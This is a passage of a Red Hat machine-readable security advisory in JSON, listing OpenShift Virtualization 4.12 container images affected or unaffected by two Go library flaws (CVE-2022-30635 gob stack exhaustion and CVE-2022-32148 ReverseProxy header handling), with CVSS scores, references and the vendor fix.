"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2107388"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. When calling Decoder, Decode on a message that contains deeply nested structures, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: encoding/gob: stack exhaustion in Decoder.Decode",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) starting from 4.10 stream is already compiled in the patched version of Go, hence is not affected by this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-30635"
},
{
"category": "external",
"summary": "RHBZ#2107388",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-30635",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30635"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30635",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30635"
},
{
"category": "external",
"summary": "https://go.dev/issue/53615",
"url": "https://go.dev/issue/53615"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE",
"url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE"
}
],
"release_date": "2022-07-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: encoding/gob: stack exhaustion in Decoder.Decode"
},
{
"cve": "CVE-2022-32148",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2022-07-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2107383"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in net/http/httputil golang package. When httputil.ReverseProxy.ServeHTTP is called with a Request.Header map containing a nil value for the X-Forwarded-For header, ReverseProxy could set the client IP incorrectly. This issue may affect confidentiality.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-32148"
},
{
"category": "external",
"summary": "RHBZ#2107383",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-32148",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32148"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-32148",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32148"
},
{
"category": "external",
"summary": "https://go.dev/issue/53423",
"url": "https://go.dev/issue/53423"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE",
"url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE"
}
],
"release_date": "2022-07-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
